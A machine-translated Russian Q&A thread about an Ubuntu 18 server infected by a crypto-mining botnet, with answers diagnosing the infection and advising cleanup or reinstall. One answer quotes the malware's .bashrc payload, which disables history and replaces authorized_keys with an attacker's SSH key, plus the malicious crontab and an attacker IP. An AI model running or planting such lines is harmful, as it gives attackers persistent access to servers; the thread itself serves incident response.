Странное задание Cron занимает 100% ресурсов процессора Ubuntu 18 LTS Server

Я продолжаю получать рабочие места, и я понятия не имею, что они делают. Обычно я запускаю kill -9, чтобы остановить их. Они занимают 100% моего процессора и могут работать в течение нескольких дней, пока я не проверю. Кто-нибудь знает что это значит?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

Я использую сервер Ubuntu 18 LTS, полностью обновленный по состоянию на вчерашний день 24.07.2009

ОБНОВИТЬ

Я ценю все отзывы. Я отключил все диски с данными и приложениями, так как единственное, на что это повлияло, это диск с ОС, по крайней мере, я так поступил правильно. Я иду с полной перестройкой, с гораздо большей безопасностью и более безопасными методами.

Ваша машина, скорее всего, заражена крипто-майнером. Вы можете увидеть, как кто-то другой сообщает о похожих именах файлов и поведении при реальном обнаружении виртуальной машины в Azure с помощью Центра безопасности . См. Также Мой сервер Ubuntu содержит вирус ... Я обнаружил его, но не могу избавиться от него ... в Reddit.

Вы больше не можете доверять этой машине и должны переустановить ее. Будьте осторожны с восстановлением резервных копий.

Ваша машина была заражена атакой крипто-майнера. Я также сталкивался с подобной атакой вымогателей в прошлом, и моя база данных была взломана. Я взял дамп SQL для машины и заново подготовил ее (поскольку моя машина была виртуальной машиной, размещенной на AWS EC2). Я также изменил группы безопасности машины, чтобы заблокировать доступ по SSH и изменить пароли. Я также включил ведение журнала, чтобы регистрировать запросы и экспортировать его в S3 каждую ночь.

То же самое случилось со мной, и я заметил вчера. Я проверил файл, /var/log/syslogи этот IP (185.234.218.40), по-видимому, автоматически выполнял cronjobs.

Я проверил это на http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ), и у него есть несколько отчетов. Эти файлы были отредактированы трояном:

• .bashrc
• .ssh / authorized_keys

Я нашел это в конце .bashrc(который выполняется каждый раз, когда открывается bash):

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

Это удаление вашего authorized_keysфайла, представляющего собой список ключей SSH, которым разрешено подключаться без пароля. Затем он добавляет ключ SSH атакующего:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

Кроме того, я нашел эту папку:, /tmp/.X13-unix/.rsyncгде находится все вредоносное ПО. Я даже нашел файл, /tmp/.X13-unix/.rsync/c/ipфайл, содержащий 70 000 IP-адресов, которые, скорее всего, являются другими жертвами или серверами узлов.

Есть 2 решения: A:

• Добавьте брандмауэр, блокирующий все исходящие соединения, кроме порта 22 и других, которые вы считаете необходимыми, и включите fail2ban, программу, которая блокирует IP-адрес после X неудачных попыток ввода пароля.

• Убить все задания cron:, ps aux | grep cronзатем убить PID, который появляется

• Измените свой пароль на безопасный

B:

• Сделайте резервную копию любых файлов или папок, которые вам нужны или которые вы хотите

• Перезагрузите сервер и переустановите Ubuntu или создайте новую каплю напрямую.

  Как сказал Том Виггерс, вы, безусловно, являетесь частью бот-сети по майнингу биткойнов, и у вашего сервера есть черный ход . Бэкдор использует эксплойт Perl, файл, расположенный здесь:, /tmp/.X13-unix/.rsync/b/runсодержащий это ( https://pastebin.com/ceP2jsUy )

Самые подозрительные папки, которые я нашел, были:

• /tmp/.X13-unix/.rsync

• ~/.bashrc (который был отредактирован)

• ~/.firefoxcatche

Наконец, есть статья, относящаяся к бэкдору Perl: https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

Я надеюсь, что вы найдете это полезным.